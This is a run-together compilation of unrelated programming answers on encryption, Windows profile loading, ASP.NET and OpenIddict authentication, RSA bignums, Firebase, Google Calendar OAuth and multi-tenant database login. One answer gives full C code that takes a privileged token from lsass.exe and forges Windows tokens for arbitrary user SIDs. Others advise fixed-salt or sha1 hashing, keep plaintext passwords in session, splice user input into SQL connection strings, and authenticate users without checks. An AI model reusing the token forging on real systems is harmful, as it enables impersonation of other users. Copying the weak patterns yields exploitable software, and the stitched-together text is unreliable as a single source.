PHP provides built-in solutions for encrypting and decrypting data. MCrypt, for example, supports a good selection of common algorithms. Which cipher you choose is up to you, depending on the level of security required; read up on block ciphers at Wikipedia for the general picture. Edit: I've just learned that MCrypt is deprecated as of PHP 7.1 and OpenSSL is recommended in its place.

If the phone numbers must be inaccessible even if an attacker gains complete access to your system, then the decryption key must obviously be kept off-server, i.e. you can't store it in the database or the filesystem. Under your spec, this key would be the e-mail address that's matched with the phone number. At input time you'd one-way hash the e-mail, and use the unhashed e-mail as the key for encrypting the phone number. At request time, you'd find the matching phone number by the e-mail hash, and decrypt it using the unhashed e-mail as the key. That should get you sorted.

Update: When fetching the record that matches a phone/e-mail pair in the database, if you've used password_hash() (which generates a new salt and a unique string each time), your only option is to fetch all records and run each through password_verify(). That's not particularly scalable. Unless this is an exercise in security, I'm not sure I'd bother with more than a simple sha1() hash for the e-mails. Alternatively, use e.g. crypt($email, '$2y$08$Some22CharsOfFixedSalt$') -- see crypt() -- to generate a Blowfish-based hash that uses a fixed salt string, resulting in an invariant hash. I'd also truncate the leading salt part of the resulting string before storing it in the database. If you're feeling crafty, you could cook up an algorithm that derives a unique string from each e-mail, and use that as the salt in your hashing function, instead of using the same salt for all e-mails.

You could also delegate the e-mail hashing to the database and use MySQL's encryption functions. Then you'd use e.g. SHA2('email', 256) in your INSERT and SELECT queries, like so: INSERT INTO records VALUES (SHA2('email@what', 256), 'TheEncryptedTelNo'); and SELECT * FROM records WHERE email = SHA2('email@what', 256);. (Be sure to note the manual's caution about plaintext data possibly ending up in logs; i.e. know your MySQL setup before doing this.)
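To make the flow above concrete, here is a toy sketch of the hash-for-lookup / encrypt-with-unhashed-email scheme. It's in Python purely for brevity, and the XOR "cipher" is a stand-in for a real cipher (e.g. AES via OpenSSL); do not use it for actual security.

```python
# Toy sketch of the scheme: lookup by one-way hash of the e-mail,
# encrypt the phone number with a key derived from the unhashed e-mail.
import hashlib

def lookup_key(email):
    # One-way hash of the e-mail, used as the database lookup column.
    return hashlib.sha256(email.encode()).hexdigest()

def xor_cipher(data, email):
    # Derive a keystream from the unhashed e-mail; XOR is symmetric,
    # so the same function both encrypts and decrypts.
    key = hashlib.pbkdf2_hmac("sha256", email.encode(), b"fixed-salt", 1000, len(data))
    return bytes(a ^ b for a, b in zip(data, key))

db = {}

# At input time: store the encrypted phone number under the e-mail hash.
email, phone = "email@what", b"+1-555-0100"
db[lookup_key(email)] = xor_cipher(phone, email)

# At request time: find the row by the hash, decrypt with the unhashed e-mail.
row = db[lookup_key(email)]
print(xor_cipher(row, email))  # b'+1-555-0100'
```

The point is that the stored hash lets you find the row without storing the e-mail, while only a requester who actually knows the e-mail can decrypt the phone number.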
Information about local user profiles is stored under this Registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList. You can enumerate its subkeys, each of which has a ProfileImagePath value that points to the folder where ntuser.dat is located. But loading a user profile directly with RegLoadKey() is very bad. First, the profile may already be loaded. Second, after you load the profile yourself, the system may also try to load it. Note the RefCount value: the system uses it to load the profile if it is not already loaded, incrementing RefCount; UnloadUserProfile() decrements RefCount and unloads the profile (by calling RegUnLoadKey()) only when it becomes 0. So all profile load/unload operations must be synchronized. There is only one correct way to load a profile: call LoadUserProfile(). (Internally it performs an RPC call to profsvc.LoadUserProfileServer in svchost.exe -k netsvcs, where all the synchronization is done.)

So how do you get the user token for LoadUserProfile()? The obvious way is to call LogonUser(), which you said you do not want to do (and cannot, unless you have the user's password). But there does exist another way that works (I have tested it), although it is undocumented. LoadUserProfile() uses only the user SID from the token (queried with the TokenUser information class) and then works with the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\<Sid> key. It is possible to create a token with any given SID by calling ZwCreateToken(), but that call requires SE_CREATE_TOKEN_PRIVILEGE. This privilege exists only in the lsass.exe process. So a possible solution is: open lsass.exe and get its token, or impersonate one of its threads;
enable SE_CREATE_TOKEN_PRIVILEGE in the token; after impersonation, enumerate HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList and for each subkey query its Sid value, or (if Sid does not exist) convert the subkey name to a SID using ConvertStringSidToSid(); create a token with that SID; and finally call LoadUserProfile().

-------------- EDIT: code example, by request --------------

The code uses ntdll exports (which some people here strongly dislike), but here it is as-is. First we need to obtain SE_CREATE_TOKEN_PRIVILEGE in order to create tokens ourselves later: enumerate the processes in the system, open each process's token, and check whether SE_CREATE_TOKEN_PRIVILEGE exists in that token; if it does, duplicate the token, enable SE_CREATE_TOKEN_PRIVILEGE in the duplicate if needed, and finally impersonate with the duplicated token.

    BOOL g_IsXP; // true if we are on Windows XP, false otherwise

    static volatile UCHAR guz;
    static OBJECT_ATTRIBUTES zoa = { sizeof(zoa) };

    NTSTATUS ImpersonateIfConformToken(HANDLE hToken)
    {
        ULONG cb = 0, rcb = 0x200;
        PVOID stack = alloca(guz);
        union {
            PVOID buf;
            PTOKEN_PRIVILEGES ptp;
        };
        NTSTATUS status;
        do {
            if (cb < rcb) {
                cb = RtlPointerToOffset(buf = alloca(rcb - cb), stack);
            }
            if (0 <= (status = ZwQueryInformationToken(hToken, TokenPrivileges, buf, cb, &rcb))) {
                if (ULONG PrivilegeCount = ptp->PrivilegeCount) {
                    PLUID_AND_ATTRIBUTES Privileges = ptp->Privileges;
                    do {
                        if (Privileges->Luid.LowPart == SE_CREATE_TOKEN_PRIVILEGE && !Privileges->Luid.HighPart) {
                            static SECURITY_QUALITY_OF_SERVICE sqos = {
                                sizeof sqos, SecurityImpersonation, SECURITY_DYNAMIC_TRACKING, FALSE
                            };
                            static OBJECT_ATTRIBUTES soa = { sizeof(soa), 0, 0, 0, 0, &sqos };
                            if (0 <= (status = ZwDuplicateToken(hToken, TOKEN_ADJUST_PRIVILEGES|TOKEN_IMPERSONATE,
                                &soa, FALSE, TokenImpersonation, &hToken))) {
                                if (Privileges->Attributes & SE_PRIVILEGE_ENABLED) {
                                    status = STATUS_SUCCESS;
                                } else {
                                    static TOKEN_PRIVILEGES tp = {
                                        1, { { { SE_CREATE_TOKEN_PRIVILEGE }, SE_PRIVILEGE_ENABLED } }
                                    };
                                    status = ZwAdjustPrivilegesToken(hToken, FALSE, &tp, 0, 0, 0);
                                }
                                if (status == STATUS_SUCCESS) {
                                    status = ZwSetInformationThread(NtCurrentThread(), ThreadImpersonationToken,
                                        &hToken, sizeof(HANDLE));
                                }
                                ZwClose(hToken);
                            }
                            return status;
                        }
                    } while (Privileges++, --PrivilegeCount);
                }
                return STATUS_PRIVILEGE_NOT_HELD;
            }
        } while (status == STATUS_BUFFER_TOO_SMALL);
        return status;
    }

    NTSTATUS GetCreateTokenPrivilege()
    {
        BOOLEAN b;
        RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &b);
        ULONG cb = 0, rcb = 0x10000;
        PVOID stack = alloca(guz);
        union {
            PVOID buf;
            PBYTE pb;
            PSYSTEM_PROCESS_INFORMATION pspi;
        };
        NTSTATUS status;
        do {
            if (cb < rcb) {
                cb = RtlPointerToOffset(buf = alloca(rcb - cb), stack);
            }
            if (0 <= (status = ZwQuerySystemInformation(SystemProcessInformation, buf, cb, &rcb))) {
                status = STATUS_UNSUCCESSFUL;
                ULONG NextEntryOffset = 0;
                do {
                    pb += NextEntryOffset;
                    if (pspi->InheritedFromUniqueProcessId && pspi->UniqueProcessId) {
                        CLIENT_ID cid = { pspi->UniqueProcessId };
                        NTSTATUS s = STATUS_UNSUCCESSFUL;
                        HANDLE hProcess, hToken;
                        if (0 <= ZwOpenProcess(&hProcess,
                            g_IsXP ? PROCESS_QUERY_INFORMATION : PROCESS_QUERY_LIMITED_INFORMATION, &zoa, &cid)) {
                            if (0 <= ZwOpenProcessToken(hProcess, TOKEN_DUPLICATE|TOKEN_QUERY, &hToken)) {
                                s = ImpersonateIfConformToken(hToken);
                                NtClose(hToken);
                            }
                            NtClose(hProcess);
                        }
                        if (s == STATUS_SUCCESS) {
                            return STATUS_SUCCESS;
                        }
                    }
                } while (NextEntryOffset = pspi->NextEntryOffset);
                return status;
            }
        } while (status == STATUS_INFO_LENGTH_MISMATCH);
        return STATUS_UNSUCCESSFUL;
    }

Once we have SE_CREATE_TOKEN_PRIVILEGE, we can create a token:

    NTSTATUS CreateUserToken(PHANDLE phToken, PSID Sid)
    {
        HANDLE hToken;
        TOKEN_STATISTICS ts;
        NTSTATUS status = ZwOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY, &hToken);
        if (0 <= status) {
            if (0 <= (status = ZwQueryInformationToken(hToken, TokenStatistics, &ts, sizeof(ts), &ts.DynamicCharged))) {
                ULONG cb = 0, rcb = 0x200;
                PVOID stack = alloca(guz);
                union {
                    PVOID buf;
                    PTOKEN_PRIVILEGES ptp;
                };
                do {
                    if (cb < rcb) {
                        cb = RtlPointerToOffset(buf = alloca(rcb - cb), stack);
                    }
                    if (0 <= (status = ZwQueryInformationToken(hToken, TokenPrivileges, buf, cb, &rcb))) {
                        TOKEN_USER User = { { Sid } };
                        static TOKEN_SOURCE Source = { { ' ','U','s','e','r','3','2',' ' } };
                        static TOKEN_DEFAULT_DACL tdd; // 0 - default DACL
                        static TOKEN_GROUPS Groups;    // no groups
                        static SECURITY_QUALITY_OF_SERVICE sqos = {
                            sizeof sqos, SecurityImpersonation, SECURITY_DYNAMIC_TRACKING
                        };
                        static OBJECT_ATTRIBUTES oa = { sizeof oa, 0, 0, 0, 0, &sqos };
                        status = ZwCreateToken(phToken, TOKEN_ALL_ACCESS, &oa, TokenPrimary,
                            &ts.AuthenticationId, &ts.ExpirationTime, &User, &Groups, ptp,
                            (PTOKEN_OWNER)&Sid, (PTOKEN_PRIMARY_GROUP)&Sid, &tdd, &Source);
                        break;
                    }
                } while (status == STATUS_BUFFER_TOO_SMALL);
            }
            ZwClose(hToken);
        }
        return status;
    }

And finally, enumerate the profiles and load/unload each user profile:

    void EnumProf()
    {
        PROFILEINFO pi = { sizeof(pi), PI_NOUI };
        pi.lpUserName = L"*";
        STATIC_OBJECT_ATTRIBUTES(soa, "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList");
        HANDLE hKey;
        if (0 <= ZwOpenKey(&hKey, KEY_READ, &soa)) {
            PVOID stack = alloca(sizeof(WCHAR));
            union {
                PVOID buf;
                PKEY_BASIC_INFORMATION pkbi;
                PKEY_VALUE_PARTIAL_INFORMATION pkvpi;
            } u = {};
            DWORD cb = 0, rcb = 64;
            NTSTATUS status;
            ULONG Index = 0;
            do {
                do {
                    if (cb < rcb) {
                        cb = RtlPointerToOffset(u.buf = alloca(rcb - cb), stack);
                    }
                    if (0 <= (status = ZwEnumerateKey(hKey, Index, KeyBasicInformation, u.buf, cb, &rcb))) {
                        *(PWSTR)RtlOffsetToPointer(u.pkbi->Name, u.pkbi->NameLength) = 0;
                        PSID Sid;
                        if (ConvertStringSidToSidW(u.pkbi->Name, &Sid)) {
                            HANDLE hToken;
                            if (0 <= CreateUserToken(&hToken, Sid)) {
                                if (LoadUserProfile(hToken, &pi)) {
                                    UnloadUserProfile(hToken, pi.hProfile);
                                }
                                NtClose(hToken);
                            }
                            LocalFree(Sid);
                        }
                    }
                } while (status == STATUS_BUFFER_OVERFLOW);
                Index++;
            } while (0 <= status);
            ZwClose(hKey);
        }
    }
I created an example as custom middleware for your case (rather than a filter). Here is how you could use the standard Identity API, even with your custom requirements. I only coded the part about using the identity; you'll have to provide the custom part.

    public void Configure(IApplicationBuilder app, IHostingEnvironment env, ILoggerFactory loggerFactory)
    {
        loggerFactory.AddConsole(Configuration.GetSection("Logging"));
        loggerFactory.AddDebug();

        // Custom authentication middleware.
        app.Use(async (context, next) =>
        {
            // Validate security here and proceed to the next line if everything is ok.
            // Replace the parameter with the username from the request.
            context.User = new System.Security.Claims.ClaimsPrincipal(new GenericIdentity("MyUser"));

            // Will print true.
            Console.WriteLine($"Is authenticated: {context.User.Identity.IsAuthenticated}");

            await next();
        });

        app.UseMvc();
    }

This code will allow you to use the standard Authorize filter on your controllers. However, I would still try to convince your boss that JWT tokens are the way to go. They are standard, secure, and better for performance, since you don't have to validate the user's data against a database on every single call. A custom solution in the security area is usually a solution with easily exploitable vulnerabilities. Good luck with your implementation.
The C language has no native support for arbitrary-precision integer ("bignum") arithmetic, so you will either have to use a library that provides it (I've heard that GMP is a popular choice) or write your own code to handle it. If you choose the do-it-yourself path, I would recommend representing your numbers as arrays of some reasonably large native unsigned integer type (e.g. uint32_t or uint64_t), with each array element representing a digit in base 2^k, where k is the number of bits in the underlying native integer type.

For RSA, you don't need to worry about representing negative values, since all the math is done with numbers ranging from 0 up to the RSA modulus n. If you want, you can also take advantage of the upper limit n to fix the number of base-2^k digits used for all the values in a particular RSA instance, so that you don't have to explicitly store the length alongside each digit array.

PS: Note that "textbook RSA" is not a secure encryption scheme by itself. To make it semantically secure, you also need to include a suitable randomized padding scheme such as OAEP. Also, padded or not, plain RSA can only encrypt messages shorter than the modulus, minus the length taken up by padding, if any. To encrypt longer messages, the standard solution is hybrid encryption: first encrypt the message using a symmetric encryption scheme (I would recommend AES-SIV) with a random key, and then encrypt that key with RSA.
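To illustrate the digit representation, here is a small sketch in Python (which has native bignums, so this is purely to show the arithmetic; real C code would use arrays of uint32_t):

```python
# A large number stored as a fixed-width array of base-2**32 digits,
# least significant digit first, as described above.
K = 32
BASE = 1 << K  # 2**32

def to_digits(n, width):
    """Split n into `width` base-2**32 digits (little-endian)."""
    digits = []
    for _ in range(width):
        digits.append(n % BASE)
        n //= BASE
    return digits

def from_digits(digits):
    """Reassemble the integer from its base-2**32 digits."""
    n = 0
    for d in reversed(digits):
        n = n * BASE + d
    return n

# With a 2048-bit modulus, every value fits in 2048/32 = 64 digits,
# so the digit count can be fixed per RSA instance.
n = 2**521 - 1
digits = to_digits(n, 64)
assert from_digits(digits) == n
```

Arithmetic on this representation then works digit by digit with carries, exactly like schoolbook arithmetic in base 2^32.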
I started from this solution and polished it a little bit, and arrived at a pretty handy setup. I created a custom class named FirebaseAPI. It is a singleton class, and it contains all the methods for Firebase (Authentication, Database, Storage, ...). Example:

FirebaseAPI.swift

    import FirebaseAuth
    import FirebaseDatabase

    class FirebaseAPI {

        static let shared = FirebaseAPI()

        private init() {}

        // Authentication
        func logInUser(onCompletion: @escaping (String?) -> Void) {
            FIRAuth.auth()?.signInAnonymously(completion: { (user, error) in
                if error == nil {
                    onCompletion(user!.uid)
                } else {
                    onCompletion(nil)
                }
            })
        }

        // Database
        func getObjects(parameter: ParameterClass, onCompletion: @escaping ([ObjectClass]) -> Void) {
            Constants.Firebase.References.Objects?.observe(.value, with: { snapshot in
                var objects = [ObjectClass]()
                if snapshot.exists() {
                    for child in snapshot.children.allObjects {
                        let object = ObjectClass(snapshot: child as! FIRDataSnapshot)
                        objects.append(object)
                    }
                }
                onCompletion(objects)
            })
        }
    }

Constants.swift

    import FirebaseDatabase

    struct Constants {
        struct Firebase {
            struct References {
                static var CurrentUser: FIRDatabaseReference?
                static var Objects: FIRDatabaseReference?
            }
        }
    }

AppDelegate.swift

    import UIKit
    import Firebase

    @UIApplicationMain
    class AppDelegate: UIResponder, UIApplicationDelegate {

        var window: UIWindow?

        func application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplicationLaunchOptionsKey: Any]?) -> Bool {
            FIRApp.configure()
            FirebaseAPI.shared.logInUser(onCompletion: { uid in
                if uid != nil {
                    Constants.Firebase.References.CurrentUser = FIRDatabase.database().reference().child("users").child(uid!)
                    Constants.Firebase.References.CurrentUser?.keepSynced(true)
                    Constants.Firebase.References.Objects = FIRDatabase.database().reference().child("objects")
                    Constants.Firebase.References.Objects?.keepSynced(true)
                }
            })
            return true
        }
    }

I could give you an example of calling FirebaseAPI methods from a ViewController, but an example of such a call is already shown in AppDelegate.swift above (the FirebaseAPI.shared.logInUser method). I've used this structure in 3 different projects so far and it works fluently!
I think it is quite dangerous to allow the client to decrypt the token. If they can do that, a malicious actor can modify the token and the claims inside it. If you don't check the validity of the claims (perhaps because they are provided by a third party), that could lead to privilege escalation and the compromise of your application. If the client application requires the claims, perhaps for UI layout, then you can supply them separately from the token. One way to do this would be via an ActionFilterAttribute that writes the claims to a custom HTTP header. If the claims are tampered with there, it only affects the client, since you will check the secure claims inside the token before processing any request.

    public class AddClaimsAttribute : System.Web.Http.Filters.ActionFilterAttribute
    {
        public override void OnActionExecuted(System.Web.Http.Filters.HttpActionExecutedContext actionExecutedContext)
        {
            var principal = actionExecutedContext.ActionContext.RequestContext.Principal as ClaimsPrincipal;
            if (principal != null)
            {
                var claims = principal.Claims.Select(x => x.Type + ":" + x.Value).ToList();
                actionExecutedContext.Response.Content.Headers.Add("Claims", String.Join(",", claims));
            }
        }
    }

Your client then just needs to check for this header and parse it. This is a basic example; you could format it as JSON or add a series of custom headers ("IsAdmin", "IsEditingUser", etc.). Because it is a filter, you can apply it globally to every request, to every action on a controller, or to a specific action, as you need.
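On the client side, the header produced above is just comma-separated "type:value" pairs. A minimal parsing sketch (in Python for illustration; the header name "Claims" and the sample claim types are from the example above, and real claim values containing commas would need a JSON format instead):

```python
# Parse the custom "Claims" header emitted by the filter above, which joins
# claims as "type:value" pairs separated by commas.

def parse_claims_header(header_value):
    """Parse 'type:value,type:value' into a list of (type, value) tuples."""
    claims = []
    for pair in header_value.split(","):
        # partition splits on the first ':' only, so values may contain ':'
        claim_type, _, claim_value = pair.partition(":")
        claims.append((claim_type, claim_value))
    return claims

header = "role:Admin,name:alice"
print(parse_claims_header(header))  # [('role', 'Admin'), ('name', 'alice')]
```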
"What I need is to not only return the claims serialized in the access_token but to return them in the response like this:"

While I'd encourage you to store these claims in identity tokens, so that they can be easily read by the client in a completely standard way, returning them as part of the token response is possible in OpenIddict 1.0 and 2.0 RTM. For that, you have 2 options:

Using a special "public" property (in your authorization controller, where the authentication tickets are created):

    ticket.SetProperty("custom_claim" + OpenIddictConstants.PropertyTypes.String, user.Id);

Note: OpenIddictConstants.PropertyTypes.String is a special suffix indicating that the authentication property added to the ticket can be exposed as part of the token response. Other constants are available if you prefer returning your claim as a JSON number or a more complex JSON structure.

Using the events model (in Startup.cs):

    services.AddOpenIddict()
        // Register the OpenIddict core services.
        .AddCore(options =>
        {
            // ...
        })

        // Register the OpenIddict server handler.
        .AddServer(options =>
        {
            // ...

            options.AddEventHandler<OpenIddictServerEvents.ApplyTokenResponse>(
                notification =>
                {
                    if (string.IsNullOrEmpty(notification.Context.Error))
                    {
                        var principal = notification.Context.Ticket.Principal;
                        var response = notification.Context.Response;
                        response["custom_claim"] = principal.FindFirst("your_claim_attached_to_the_principal").Value;
                    }

                    return Task.FromResult(OpenIddictServerEventState.Unhandled);
                });
        })

        // Register the OpenIddict validation handler.
        .AddValidation();
The Google API Client Library for .NET does not currently support UWP, so we can't use the Google.Apis.Calendar.v3 client library in UWP apps for now. For more info, please see this similar question: Universal Windows Platform App with google calendar.

To use the Google Calendar API in UWP, we can call it through the REST API. To use the REST API, we need to authorize requests first. For how to authorize requests, please see Authorizing Requests to the Google Calendar API and Using OAuth 2.0 for Mobile and Desktop Applications. After we have the access token, we can call the Calendar API like the following:

    var clientId = "{Your Client Id}";
    var redirectURI = "pw.oauth2:/oauth2redirect";
    var scope = "https://www.googleapis.com/auth/calendar.readonly";

    var authUrl = $"https://accounts.google.com/o/oauth2/auth?client_id={clientId}&redirect_uri={Uri.EscapeDataString(redirectURI)}&response_type=code&scope={Uri.EscapeDataString(scope)}";
    var StartUri = new Uri(authUrl);
    var EndUri = new Uri(redirectURI);

    // Get the authorization code
    WebAuthenticationResult WebAuthenticationResult = await WebAuthenticationBroker.AuthenticateAsync(WebAuthenticationOptions.None, StartUri, EndUri);
    if (WebAuthenticationResult.ResponseStatus == WebAuthenticationStatus.Success)
    {
        var decoder = new WwwFormUrlDecoder(new Uri(WebAuthenticationResult.ResponseData).Query);
        if (decoder[0].Name != "code")
        {
            System.Diagnostics.Debug.WriteLine($"OAuth authorization error: {decoder.GetFirstValueByName("error")}.");
            return;
        }
        var authorizationCode = decoder.GetFirstValueByName("code");

        // Get the access token
        var pairs = new Dictionary<string, string>();
        pairs.Add("code", authorizationCode);
        pairs.Add("client_id", clientId);
        pairs.Add("redirect_uri", redirectURI);
        pairs.Add("grant_type", "authorization_code");
        var formContent = new Windows.Web.Http.HttpFormUrlEncodedContent(pairs);

        var client = new Windows.Web.Http.HttpClient();
        var httpResponseMessage = await client.PostAsync(new Uri("https://www.googleapis.com/oauth2/v4/token"), formContent);
        if (!httpResponseMessage.IsSuccessStatusCode)
        {
            System.Diagnostics.Debug.WriteLine($"OAuth authorization error: {httpResponseMessage.StatusCode}.");
            return;
        }

        string jsonString = await httpResponseMessage.Content.ReadAsStringAsync();
        var jsonObject = Windows.Data.Json.JsonObject.Parse(jsonString);
        var accessToken = jsonObject["access_token"].GetString();

        // Call the Google Calendar API
        using (var httpRequest = new Windows.Web.Http.HttpRequestMessage())
        {
            string calendarAPI = "https://www.googleapis.com/calendar/v3/users/me/calendarList";
            httpRequest.Method = Windows.Web.Http.HttpMethod.Get;
            httpRequest.RequestUri = new Uri(calendarAPI);
            httpRequest.Headers.Authorization = new Windows.Web.Http.Headers.HttpCredentialsHeaderValue("Bearer", accessToken);
            var response = await client.SendRequestAsync(httpRequest);
            if (response.IsSuccessStatusCode)
            {
                var listString = await response.Content.ReadAsStringAsync();
                //TODO
            }
        }
    }
Based on your question, I'm going to provide a solution, assuming some things. First, I've created three databases in my local SQL Server instance:

    create database CompanyFoo
    go

    create database CompanyBar
    go

    create database CompanyZaz
    go

Then, I'm going to create one table with one row in each database:

    use CompanyFoo
    go

    drop table ConfigurationValue
    go

    create table ConfigurationValue
    (
        Id int not null identity(1, 1),
        Name varchar(255) not null,
        [Desc] varchar(max) not null
    )
    go

    insert into ConfigurationValue values ('Company name', 'Foo Company')
    go

    use CompanyBar
    go

    drop table ConfigurationValue
    go

    create table ConfigurationValue
    (
        Id int not null identity(1, 1),
        Name varchar(255) not null,
        [Desc] varchar(max) not null
    )
    go

    insert into ConfigurationValue values ('Company name', 'Bar Company')
    go

    use CompanyZaz
    go

    drop table ConfigurationValue
    go

    create table ConfigurationValue
    (
        Id int not null identity(1, 1),
        Name varchar(255) not null,
        [Desc] varchar(max) not null
    )
    go

    insert into ConfigurationValue values ('Company name', 'Zaz Company')
    go

The next step is to create a user with SQL authentication and grant it read access to the databases; in my case the user name is johnd and the password is 123. Once these steps are completed, we proceed to create an MVC application in ASP.NET Core; I used MultipleCompany as the project name. I have two controllers, Home and Administration: the goal is to show a login view first and then redirect to another view that shows data from the database selected in the "login" view. To accomplish your requirement, you'll need to use session state in the ASP.NET Core application; you can change the way this data is stored and read later, as this is for concept testing only.
HomeController code:

    using Microsoft.AspNetCore.Http;
    using Microsoft.AspNetCore.Mvc;
    using MultipleCompany.Models;

    namespace MultipleCompany.Controllers
    {
        public class HomeController : Controller
        {
            public IActionResult Index()
            {
                return View();
            }

            [HttpPost]
            public IActionResult Index(LoginModel model)
            {
                HttpContext.Session.SetString("CompanyCode", model.CompanyCode);
                HttpContext.Session.SetString("UserName", model.UserName);
                HttpContext.Session.SetString("Password", model.Password);

                return RedirectToAction("Index", "Administration");
            }

            public IActionResult Error()
            {
                return View();
            }
        }
    }

AdministrationController code:

    using System.Linq;
    using Microsoft.AspNetCore.Http;
    using Microsoft.AspNetCore.Mvc;
    using Microsoft.AspNetCore.Mvc.Filters;
    using MultipleCompany.Models;
    using MultipleCompany.Services;

    namespace MultipleCompany.Controllers
    {
        public class AdministrationController : Controller
        {
            protected IDbContextService DbContextService;
            protected CompanyDbContext DbContext;

            public AdministrationController(IDbContextService dbContextService)
            {
                DbContextService = dbContextService;
            }

            public override void OnActionExecuting(ActionExecutingContext context)
            {
                DbContext = DbContextService.CreateCompanyDbContext(HttpContext.Session.CreateLoginModelFromSession());

                base.OnActionExecuting(context);
            }

            public IActionResult Index()
            {
                var model = DbContext.ConfigurationValue.ToList();

                return View(model);
            }
        }
    }

Code for the Home view:

    @{
        ViewData["Title"] = "Home Page";
    }

    <form action="/home" method="post">
        <fieldset>
            <legend>Log in</legend>
            <div>
                <label for="CompanyCode">Company code</label>
                <select name="CompanyCode">
                    <option value="CompanyFoo">Foo</option>
                    <option value="CompanyBar">Bar</option>
                    <option value="CompanyZaz">Zaz</option>
                </select>
            </div>
            <div>
                <label for="UserName">User name</label>
                <input type="text" name="UserName" />
            </div>
            <div>
                <label for="Password">Password</label>
                <input type="password" name="Password" />
            </div>
            <button type="submit">Log in</button>
        </fieldset>
    </form>

Code for the Administration view:

    @{
        ViewData["Title"] = "Home Page";
    }

    <h1>Welcome!</h1>

    <table class="table">
        <tr>
            <th>Name</th>
            <th>Desc</th>
        </tr>
        @foreach (var item in Model)
        {
            <tr>
                <td>@item.Name</td>
                <td>@item.Desc</td>
            </tr>
        }
    </table>

LoginModel code:

    using System;
    using Microsoft.AspNetCore.Http;

    namespace MultipleCompany.Models
    {
        public class LoginModel
        {
            public String CompanyCode { get; set; }
            public String UserName { get; set; }
            public String Password { get; set; }
        }

        public static class LoginModelExtensions
        {
            public static LoginModel CreateLoginModelFromSession(this ISession session)
            {
                var companyCode = session.GetString("CompanyCode");
                var userName = session.GetString("UserName");
                var password = session.GetString("Password");

                return new LoginModel { CompanyCode = companyCode, UserName = userName, Password = password };
            }
        }
    }

CompanyDbContext code:

    using System;
    using Microsoft.EntityFrameworkCore;

    namespace MultipleCompany.Models
    {
        public class CompanyDbContext : Microsoft.EntityFrameworkCore.DbContext
        {
            public CompanyDbContext(String connectionString)
            {
                ConnectionString = connectionString;
            }

            public String ConnectionString { get; }

            protected override void OnConfiguring(DbContextOptionsBuilder optionsBuilder)
            {
                optionsBuilder.UseSqlServer(ConnectionString);

                base.OnConfiguring(optionsBuilder);
            }

            protected override void OnModelCreating(ModelBuilder modelBuilder)
            {
                base.OnModelCreating(modelBuilder);
            }

            public DbSet<ConfigurationValue> ConfigurationValue { get; set; }
        }
    }

ConfigurationValue code:

    using System;

    namespace MultipleCompany.Models
    {
        public class ConfigurationValue
        {
            public Int32? Id { get; set; }
            public String Name { get; set; }
            public String Desc { get; set; }
        }
    }

AppSettings code:

    using System;

    namespace MultipleCompany.Models
    {
        public class AppSettings
        {
            public String CompanyConnectionString { get; set; }
        }
    }

IDbContextService code:

    using MultipleCompany.Models;

    namespace MultipleCompany.Services
    {
        public interface IDbContextService
        {
            CompanyDbContext CreateCompanyDbContext(LoginModel model);
        }
    }

DbContextService code:

    using System;
    using Microsoft.Extensions.Options;
    using MultipleCompany.Models;

    namespace MultipleCompany.Services
    {
        public class DbContextService : IDbContextService
        {
            public DbContextService(IOptions<AppSettings> appSettings)
            {
                ConnectionString = appSettings.Value.CompanyConnectionString;
            }

            public String ConnectionString { get; }

            public CompanyDbContext CreateCompanyDbContext(LoginModel model)
            {
                var connectionString = ConnectionString
                    .Replace("{database}", model.CompanyCode)
                    .Replace("{user id}", model.UserName)
                    .Replace("{password}", model.Password);

                var dbContext = new CompanyDbContext(connectionString);

                return dbContext;
            }
        }
    }

Startup code:

    using Microsoft.AspNetCore.Builder;
    using Microsoft.AspNetCore.Hosting;
    using Microsoft.Extensions.Configuration;
    using Microsoft.Extensions.DependencyInjection;
    using Microsoft.Extensions.Logging;
    using MultipleCompany.Models;
    using MultipleCompany.Services;

    namespace MultipleCompany
    {
        public class Startup
        {
            public Startup(IHostingEnvironment env)
            {
                var builder = new ConfigurationBuilder()
                    .SetBasePath(env.ContentRootPath)
                    .AddJsonFile("appsettings.json", optional: true, reloadOnChange: true)
                    .AddJsonFile($"appsettings.{env.EnvironmentName}.json", optional: true)
                    .AddEnvironmentVariables();

                Configuration = builder.Build();
            }

            public IConfigurationRoot Configuration { get; }

            // This method gets called by the runtime. Use this method to add services to the container.
            public void ConfigureServices(IServiceCollection services)
            {
                // Add framework services.
                services.AddMvc();

                services.AddEntityFrameworkSqlServer().AddDbContext<CompanyDbContext>();

                services.AddScoped<IDbContextService, DbContextService>();

                services.AddDistributedMemoryCache();
                services.AddSession();

                services.AddOptions();
                services.Configure<AppSettings>(Configuration.GetSection("AppSettings"));
                services.AddSingleton<IConfiguration>(Configuration);
            }

            // This method gets called by the runtime. Use this method to configure the HTTP request pipeline.
            public void Configure(IApplicationBuilder app, IHostingEnvironment env, ILoggerFactory loggerFactory)
            {
                loggerFactory.AddConsole(Configuration.GetSection("Logging"));
                loggerFactory.AddDebug();

                if (env.IsDevelopment())
                {
                    app.UseDeveloperExceptionPage();
                    app.UseBrowserLink();
                }
                else
                {
                    app.UseExceptionHandler("/Home/Error");
                }

                app.UseStaticFiles();

                app.UseSession();

                app.UseMvc(routes =>
                {
                    routes.MapRoute(
                        name: "default",
                        template: "{controller=Home}/{action=Index}/{id?}");
                });
            }
        }
    }

I've added these packages to my project:

    "Microsoft.EntityFrameworkCore": "1.0.1",
    "Microsoft.EntityFrameworkCore.SqlServer": "1.0.1",
    "Microsoft.AspNetCore.Session": "1.0.0"

My appsettings.json file:

    {
      "Logging": {
        "IncludeScopes": false,
        "LogLevel": {
          "Default": "Debug",
          "System": "Information",
          "Microsoft": "Information"
        }
      },
      "AppSettings": {
        "CompanyConnectionString": "server=(local);database={database};user id={user id};password={password}"
      }
    }

Please focus on the concept of connecting to the database selected in the home view; you can change any part of this code as an improvement. Remember that I'm providing this solution based on some assumptions drawn from your brief question, so please feel free to ask about any aspect of this solution and to improve this piece of code according to your requirements. Basically, we need to define a service that creates the db context instance according to the selected database: that's the IDbContextService interface, and DbContextService is the implementation of that interface.
